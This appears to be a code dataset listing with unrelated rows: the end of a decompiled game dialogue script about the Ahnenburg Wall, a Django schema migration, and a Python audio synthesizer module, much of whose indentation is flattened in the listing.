CloseMessageWindow()
ChrTalk( #46
0xFE,
(
"When I told her this is where\x01",
"I worked, she was so jealous.\x02",
)
)
CloseMessageWindow()
ChrTalk( #47
0xFE,
"It's nice that children are so meek...\x02",
)
CloseMessageWindow()
label("loc_116F")
Jump("loc_14D5")
label("loc_1172")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x47, 1)), scpexpr(EXPR_END)), "loc_1265")
ChrTalk( #48
0xFE,
(
"There's been nothing out of\x01",
"the ordinary today.\x02",
)
)
CloseMessageWindow()
ChrTalk( #49
0xFE,
(
"Both the Grancel and Rolent sides\x01",
"are pretty quiet.\x02",
)
)
CloseMessageWindow()
ChrTalk( #50
0xFE,
(
"Ten years ago the outside of this wall\x01",
"was flooded with the Imperial Army, but\x01",
"now it's almost impossible to imagine.\x02",
)
)
CloseMessageWindow()
Jump("loc_14D5")
label("loc_1265")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_1429")
OP_A2(0x0)
ChrTalk( #51
0xFE,
"Welcome to the Ahnenburg Wall.\x02",
)
CloseMessageWindow()
ChrTalk( #52
0xFE,
(
"Have you come here to sightsee\x01",
"or investigate the ruins?\x02",
)
)
CloseMessageWindow()
ChrTalk( #53
0xFE,
(
"This wall surrounds the Grancel\x01",
"region.\x02",
)
)
CloseMessageWindow()
ChrTalk( #54
0xFE,
(
"In ancient verse, the Royal City is referred\x01",
"to as a pearl and the Ahnenburg Wall is the\x01",
"oyster shell which surrounds it.\x02",
)
)
CloseMessageWindow()
ChrTalk( #55
0xFE,
(
"I've heard that the wall is so\x01",
"old that nobody really knows\x01",
"why it was built.\x02",
)
)
CloseMessageWindow()
ChrTalk( #56
0xFE,
(
"The prevailing theory seems to\x01",
"be that it was built to prevent\x01",
"enemy invasions.\x02",
)
)
CloseMessageWindow()
Jump("loc_14D5")
label("loc_1429")
ChrTalk( #57
0xFE,
(
"This wall surrounds the Grancel\x01",
"region.\x02",
)
)
CloseMessageWindow()
ChrTalk( #58
0xFE,
(
"In ancient verse, the Royal City is referred\x01",
"to as a pearl and the Ahnenburg Wall is the\x01",
"oyster shell which surrounds it.\x02",
)
)
CloseMessageWindow()
label("loc_14D5")
TalkEnd(0xFE)
Return()
# Function_4_120 end
SaveToFile()
Try(main)
|
994,998 | 89d2b75ea3d9cfa5a92408c18636ce21dde0e534 | # Generated by Django 2.0.2 on 2018-05-24 08:58
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: adds metadata columns to FieldDesc and TableDesc."""
    dependencies = [
        ('report_data_extract', '0055_auto_20180524_1153'),
    ]
    operations = [
        # Free-form choice list for a field (verbose_name: "options").
        migrations.AddField(
            model_name='fielddesc',
            name='choices',
            field=models.TextField(blank=True, default='', verbose_name='选项'),
        ),
        # Target of a foreign-key relation (verbose_name: "foreign key").
        migrations.AddField(
            model_name='fielddesc',
            name='foreignkey',
            field=models.CharField(blank=True, default='', max_length=150, verbose_name='外键'),
        ),
        # Uniqueness flag stored as text (verbose_name: "is unique").
        migrations.AddField(
            model_name='fielddesc',
            name='is_unique',
            field=models.CharField(blank=True, default='', max_length=150, verbose_name='是否唯一'),
        ),
        # Composite-unique column list (verbose_name: "unique together").
        migrations.AddField(
            model_name='tabledesc',
            name='unique_together',
            field=models.CharField(default='', max_length=300, verbose_name='联合唯一'),
        ),
    ]
|
994,999 | 9bd800ab25a2f431decfcc8ae2fbbeca3541db2c | from collections import deque
from math import sin, cos, floor, pi, log10
from numbers import Number
from util import NamedDescriptor, NamedMeta, configable, clamp
import operator
_tau = 2*pi
class SpaceTimeContinuumError (Exception):
pass
class Signal (metaclass=NamedMeta):
"""
Signals normally operate over [-1,1]. A subclass may change this.
"""
#last_t = -1
#last_samp = None
def __call__ (self, t):
"""
Sample this signal at time index t. Each call to sample must be with a
larger value for t.
"""
#if t <= self.last_t:
#raise SpaceTimeContinuumError(
#"We're moving back in time! Last t = {}, now = {}".format(
#self.last_t, t))
#samp = self._sample(t)
#self.last_t = t
#self.last_samp = samp
#return samp
pass
class Const (Signal):
    """A signal that ignores time and always yields the same value."""
    def __init__ (self, val):
        # None is treated as silence (0) so Const(None) is a valid flat signal.
        self.val = 0 if val is None else val
    def __call__ (self, t):
        return self.val
def asInput (input, type=None, const_type=Const, **kwargs):
    # Normalize an arbitrary value into something usable as a signal input:
    # bare numbers are wrapped in const_type, and the result is coerced to
    # `type` (a Signal subclass) when one is requested.
    if not isinstance(input, Signal):
        if const_type is None:
            # const_type=None means "leave plain values unwrapped".
            # TODO: This None -> 0 conversion is hacky
            if input is None:
                input = 0
            return input
        else:
            input = const_type(input)
    if type and not isinstance(input, type):
        input = type(input, **kwargs)
    return input
class Input (NamedDescriptor):
def __init__ (self, type=None, const_type=Const, **kwargs):
self.type = type
self.const_type = const_type
self.kwargs = kwargs
def __set__ (self, instance, value):
super().__set__(instance, asInput(value, self.type,
const_type=self.const_type,
**self.kwargs))
class FrequencySignal (Signal):
    """
    Frequency channels operate over [0,11000]
    """
    input = Input()
    def __init__ (self, input):
        self.input = input
    def __call__ (self, t):
        # Rescale the bipolar [-1,1] input linearly into [0,11000] Hz.
        # NOTE(review): reads self._input -- assumes the Input descriptor
        # stores the wrapped signal under an underscore-prefixed name;
        # confirm against util.NamedDescriptor.
        return (self._input(t)+1)*5500
class ConstFrequency (Const, FrequencySignal):
def __init__ (self, val):
if isinstance(val, Number) and -1 <= val <= 1:
val = (val+1)*5500
super().__init__(val)
class TriggerSignal (Signal):
    """
    Outputs a sample of 1 for one sample when the input signal crosses the
    threshold. Only after the input signal has dropped below the threshold will
    the TriggerSignal be ready to be triggered again.
    """
    input = Input()
    thresh = Input()
    def __init__ (self, input, thresh=0.5):
        self.input = input
        self.thresh = thresh
        self.hot = False  # True while the input is at/above the threshold
    def __call__ (self, t):
        samp = self.input(t)
        thresh = self.thresh(t)
        if not self.hot and samp >= thresh:
            # Rising edge: fire exactly one 1-sample pulse.
            self.hot = True
            return 1
        if self.hot and samp < thresh:
            # Falling edge: re-arm the trigger.
            self.hot = False
        # Fix: always return 0 outside the firing sample; previously the
        # hot-and-still-high path could fall off the end and return None.
        return 0
class Trigger (TriggerSignal):
    """Manually fired trigger: emits a single 1 sample after fire() is called."""
    def __init__ (self):
        self.firing = False
    def fire (self):
        # Arm the trigger; the next sample read consumes it.
        self.firing = True
    def __call__ (self, t):
        if not self.firing:
            return 0
        self.firing = False
        return 1
class GateSignal (Signal):
    """
    Outputs a sample of 1 if the input signal is >= the threshold, otherwise the
    output is 0.
    """
    input = Input()
    thresh = Input()
    def __init__ (self, input, thresh=0.5):
        self.input = input
        self.thresh = thresh
    def __call__ (self, t):
        # Comparator: low while the input sits below the threshold.
        below = self.input(t) < self.thresh(t)
        return 0 if below else 1
class Gate (GateSignal):
def __init__ (self):
self.open = 0
def on (self):
self.open = 1
def off (self):
self.open = 0
def __call__ (self, t):
return self.open
class PositiveSignal (Signal):
    # Rescales a bipolar [-1,1] signal into the unipolar range [0,1].
    input = Input()
    def __init__ (self, input):
        self.input = input
    def __call__ (self, t):
        # NOTE(review): reads self._input -- assumes the Input descriptor
        # stores the wrapped signal under an underscore-prefixed name;
        # confirm against util.NamedDescriptor.
        return (self._input(t) + 1)/2
class LinearRamp (Signal):
def __init__ (self, t_start, dur, begin=-1, end=1):
self.t_start = t_start
self.dur = dur
self.begin = begin
self.end = end
def __call__ (self, t):
if t < self.t_start:
return self.begin
if t > self.t_start + self.dur:
return self.end
return (t - self.t_start) / self.dur * (self.end - self.begin) + self.begin
class SegmentedRamp (Signal):
def __init__ (self, dur, steps, low=0, high=1):
self.dur = dur
self.steps = iter(steps)
self.low = low
self.high = high
self.next_t = 0
self.next_val = 0
self._next()
def _next (self):
self.cur_t = self.next_t
self.cur_val = self.next_val
start_t, val = next(self.steps)
start_t *= self.dur
val = (self.high - self.low) * val + self.low
self.next_t = start_t
self.next_val = val
def __call__ (self, t):
try:
while self.next_t <= t:
self._next()
except StopIteration:
return self.cur_val
if t > self.dur:
return self.cur_val
return ((t - self.cur_t) / (self.next_t - self.cur_t) *
(self.next_val - self.cur_val) + self.cur_val)
class PolyRamp (Signal):
def __init__ (self, t_start, dur, power=2):
self.t_start = t_start
self.dur = dur
self.power = power
def __call__ (self, t):
if t < self.t_start:
return -1
if t > self.t_start + self.dur:
return 1
return ((t - self.t_start)/self.dur)**self.power * 2 - 1
class ExpRamp (Signal):
def __init__ (self, t_start, dur):
self.t_start = t_start
self.dur = dur
def __call__ (self, t):
if t < self.t_start:
return -1
if t > self.t_start + self.dur:
return 1
return (10**((t - self.t_start)/self.dur) - 1)/9 * 2 - 1
class LogRamp (Signal):
def __init__ (self, t_start, dur):
self.t_start = t_start
self.dur = dur
def __call__ (self, t):
if t < self.t_start:
return -1
if t > self.t_start + self.dur:
return 1
return log10(((t - self.t_start)/self.dur)*9 + 1) * 2 - 1
class ADSREnvelope (PositiveSignal):
A = Input()
D = Input()
S = Input()
R = Input()
trigger = Input(TriggerSignal)
gate = Input(GateSignal)
def __init__ (self, A=None, D=None, S=None, R=None, trigger=None,
gate=None):
self.A = A
self.D = D
self.S = S
self.R = R
self.trigger = trigger
self.gate = gate
self.start_A = None
self.start_R = None
self.last_samp = 0
self.last_t = -1/DEFAULT_SAMPLERATE
def __call__ (self, t):
trigger = self._trigger(t)
gate = self._gate(t)
if trigger:
self.start_A = t
self.start_R = None
samp = 0
S = self._S(t)
if gate:
A = self._A(t)
D = self._D(t)
start_D = self.start_A + A
start_S = start_D + D
if self.start_A <= t < start_D:
# Attack
samp = (self.last_samp +
(1 - self.last_samp)/(self.start_A + A - t)*(t - self.last_t))
elif start_D <= t < start_S:
# Decay
samp = 1 - (t - start_D)*(1-S)/D
else:
# Sustain
samp = S
elif self.last_samp:
# Release...
if not self.start_R:
self.start_R = t
R = self._R(t)
if self.start_R <= t < self.start_R + R:
samp = (self.last_samp -
self.last_samp/(self.start_R + R - t)*(t - self.last_t))
self.last_samp = samp
self.last_t = t
return samp
def p2f (p):
    """
    Convert a pitch-channel sample in [-1, 1] to a frequency in Hz.

    Linear map: -1 -> 0 Hz, 0 -> 5500 Hz, 1 -> 11000 Hz. (Earlier
    exponential/[0,22000] mappings were abandoned; see f2p for the inverse.)
    """
    half_range = 5500
    return (p+1)*half_range
def f2p (f):
    """
    Inverse of p2f: convert a frequency in [0, 11000] Hz back to a
    pitch-channel sample in [-1, 1].
    """
    half_range = 5500
    return f/half_range - 1
class PhasedSignal (Signal):
#freq = Input(FrequencySignal, const_type=ConstFrequency)
freq = Input(FrequencySignal, const_type=None)
def __init__ (self, freq=None):
self.freq = freq
self.pa = 0
self.last_t = 0
def __call__ (self, t):
dt = t - self.last_t
self.last_t = t
f = self._freq
if callable(f):
f = f(t)
df = floor(dt*f * 2.0**24)
self.pa = (self.pa + df) & 0xFFFFFF
return self._phase[self.pa >> 14]
class Sine (PhasedSignal):
_phase = [sin(_tau*p/1024) for p in range(1024)]
class Cosine (PhasedSignal):
_phase = [cos(_tau*p/1024) for p in range(1024)]
class Saw (PhasedSignal):
_phase = [1 - 2*p/1024 for p in range(1024)]
class Square (PhasedSignal):
_phase = [1 if p/1024 < 1/2 else -1 for p in range(1024)]
class Triangle (PhasedSignal):
_phase = [2*abs(Saw._phase[(p - 256) % 1024]) - 1 for p in range(1024)]
def FourierSaw (harmonics):
class FourierSaw (PhasedSignal):
_phase = [2/pi * sum(sin(_tau*h * p/1024)/h for h in range(1, harmonics+1))
for p in range(1024)]
return FourierSaw
def FourierSquare (harmonics):
class FourierSquare (PhasedSignal):
_phase = [4/pi * sum(sin(_tau*(2*h - 1) * p/1024)/(2*h - 1)
for h in range(1, harmonics+1))
for p in range(1024)]
return FourierSquare
def FourierTriangle (harmonics):
class FourierTriangle (PhasedSignal):
_phase = [8/pi**2 * sum((-1)**h * sin(_tau*(2*h - 1) * p/1024)/(2*h - 1)**2
for h in range(1, harmonics+1))
for p in range(1024)]
return FourierTriangle
class Amp (Signal):
input = Input()
ratio = Input(PositiveSignal)
def __init__ (self, ratio, input):
self.ratio = ratio
self.input = input
def __call__ (self, t):
return self._ratio(t) * self._input(t)
def BinaryMod (func):
def Mod (mod, carrier):
class BinaryMod (type(carrier)):
left = Input()
right = Input()
def __init__ (self, left, right):
self.left = left
self.right = right
def __call__ (self, t):
return func(self._left(t), self._right(t))
return BinaryMod(mod, carrier)
return Mod
Mult = BinaryMod(operator.mul)
Bias = BinaryMod(operator.add)
#def Mult (factor, carrier):
#class Mult (type(carrier)):
#left = Input()
#right = Input()
#def __init__ (self, left, right):
#self.left = left
#self.right = right
#def __call__ (self, t):
#return self._left(t) * self._right(t)
#return Mult(factor, carrier)
class OldBias (Signal):
input = Input()
offset = Input()
def __init__ (self, offset, input):
self.offset = offset
self.input = input
def __call__ (self, t):
return self._offset(t) + self._input(t)
class Sequence (Signal):
def __init__ (self, steps=[]):
self.steps = iter(steps)
self.until = -1
self.value = 0
self.trigger = Trigger()
self.gate = Gate()
def __call__ (self, t):
if t > self.until:
try:
next_value, dur = next(self.steps)
print('Sequence:', next_value, dur)
self.until = t + dur
except StopIteration:
next_value = None
self.until = -1
if next_value is None:
self.gate.off()
# Keep our previous self.value
else:
self.trigger.fire()
self.gate.on()
self.value = next_value
return self.value
class FrequencySequence (Sequence, FrequencySignal):
pass
def Synth (steps=[], oscillator=Sine, modifier=None,
A=0.1, D=0.1, S=0.5, R=0.1):
sequencer = FrequencySequence(steps)
freq_input = sequencer
if callable(modifier):
freq_input = modifier(freq_input)
oscillator = oscillator(freq_input)
envelope = ADSREnvelope(A, D, S, R, sequencer.trigger, sequencer.gate)
return Amp(envelope, oscillator)
def AMSynth (input, factor=2):
carrier = Sine(input)
modulator = Sine(Mult(factor, input))
return Amp(modulator, carrier)
@configable
def FMSynth (input, H=1, B=1):
f_modulator = Mult(H, input)
d_carrier = Mult(B, f_modulator)
modulator_osc = Sine(f_modulator)
modulator = Mult(d_carrier, modulator_osc)
return Cosine(Bias(modulator, input))
def RMSynth (input, freq=50):
carrier = Sine(input)
modulator = Sine(freq)
return Mult(modulator, carrier)
@configable
def Vibrato (input, freq=6, cents=50):
modulator = OldBias(1, Mult(0.0005946*cents, Sine(freq)))
return Mult(modulator, input)
def Mixer (synths):
    """Combine several signal callables into one by averaging their samples."""
    count = len(synths)
    def mixed (t):
        total = 0
        for synth in synths:
            total += synth(t)
        return total/count
    return mixed
def Sampler (input, sample_rate, dur=None):
    """
    Lazily sample the callable `input` at `sample_rate` samples per second.

    Yields input(t) for t = 0, dt, 2*dt, ... and stops once t exceeds `dur`;
    runs forever when `dur` is None (or 0).
    """
    dt = 1/sample_rate
    t = 0
    while not (dur and t > dur):
        yield input(t)
        t += dt
CHANNELS = 1
DEFAULT_SAMPLERATE = 44100//2
def play (input, dur):
import alsaaudio
from util import chunk
out = alsaaudio.PCM()
out.setchannels(CHANNELS)
out.setformat(alsaaudio.PCM_FORMAT_S16_LE)
SAMPLERATE = out.setrate(DEFAULT_SAMPLERATE)
print(SAMPLERATE)
ALSAPERIOD = out.setperiodsize(SAMPLERATE//4)
total = 0
for bs in chunk(Sampler(input, SAMPLERATE, dur), ALSAPERIOD*CHANNELS):
wrote = out.write(bs)
total += wrote
print(wrote, total)
if wrote != ALSAPERIOD:
print("Huh? Only wrote {}/{}".format(wrote, ALSAPERIOD))
print('Closing...')
out.close()
def write (input, dur, filename='out.wav'):
print(DEFAULT_SAMPLERATE)
import wave, array
from util import byte_array
bytes = byte_array(Sampler(input, DEFAULT_SAMPLERATE, dur))
#bytes = array.array('f', Sampler(input, DEFAULT_SAMPLERATE*2, dur))
#f = wave.open(filename, 'w')
#f.setnchannels(CHANNELS)
#f.setsampwidth(2)
#f.setframerate(DEFAULT_SAMPLERATE)
#f.setcomptype('NONE', 'not compressed')
#f.setnframes(len(bytes))
#f.writeframesraw(bytes)
#print(f._datawritten, f._nframeswritten)
#f.close()
with open(filename + '.raw', 'wb') as rf:
rf.write(bytes)
def generate (input, dur):
""" For profiling. """
return list(Sampler(input, DEFAULT_SAMPLERATE, dur))
def random_walk ():
import random
freq = 440
while True:
if random.random() < 1/5:
yield (None, 0.25)
else:
yield (freq, 0.25)
steps = random.randint(-12, 12)
freq *= 2**(steps/12)
freq = clamp(freq, 20, 10000)
if __name__ == '__main__':
#rw = random_walk()
#synth = Synth(modifier=Vibrato(freq=3.2), oscillator=Square, A=0.13, D=0.03, S=0.5, R=0.5,
#synth = Synth(oscillator=FourierSaw(20), A=0.03, D=0.03, S=5, R=0.5,
#synth = Synth(oscillator=Saw, A=0.03, D=0.03, S=5, R=0.5,
#synth = Synth(oscillator=FourierTriangle(80), A=0.03, D=0.03, S=5, R=0.5,
#synth = Synth(oscillator=Sine, A=0.05, D=0.03, S=5, R=0.5,
#modifier=Vibrato(freq=4, cents=25),
#synth = Synth(oscillator=FMSynth(B=5, H=1), A=0.03, D=0.03, S=1, R=0.5,
#steps = (
#(440, 0.25),
#(440 * 2**(2/12), 0.25),
#(440 * 2**(3/12), 0.25),
#(None, 1.25),
#(220, 0.25),
#(220 * 2**(2/12), 0.25),
#(220 * 2**(3/12), 0.25),
#))
#play(synth, 4)
#play(Amp(Mult(-1, FourierSaw(20)(4)), synth), 4)
#play(Amp(Mult(-1, Saw(4)), synth), 4)
#synth = Synth(oscillator=FMSynth(B=LinearRamp(0,2,0,10), H=0.1),
envelope = SegmentedRamp(2,
#steps=((0.01, 1), (0.4, 0.7), (0.9, 0.9), (1, 0))); H=1;B=5 # Brassy?
#steps=((0.06, 0.5), (0.1, 1), (0.9, 1), (1, 0))); H=1/3; B=2 # Woodwind?
steps=((0.06, 0.5), (0.1, 1), (0.9, 1), (1, 0))); H=0.2; B=1.5 # Bassoon?
#steps=((0.1, 1), (0.75, 1), (1, 0))); H=2/3; B=2 # Clarinet?
oscillator = FMSynth(ConstFrequency(400), B=Mult(B, envelope), H=H)
synth = Mult(envelope, oscillator)
play(synth, 2)
#steps=iter([next(rw) for x in range(40)] + [(None, 0.5)]))
#write(synth, 10.5)
#import guitar_wave
#class Guitar (PhasedSignal):
#_phase = guitar_wave.data
#from music import PianoRoll
#import tabreader
#synths = [Synth(steps=PianoRoll(33, n), oscillator=Guitar(), A=0.03, D=0.05,
#R=0.05)
#for n in tabreader.read(tabreader.ex_tabs)]
#play(Mixer(synths), 10) #38)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.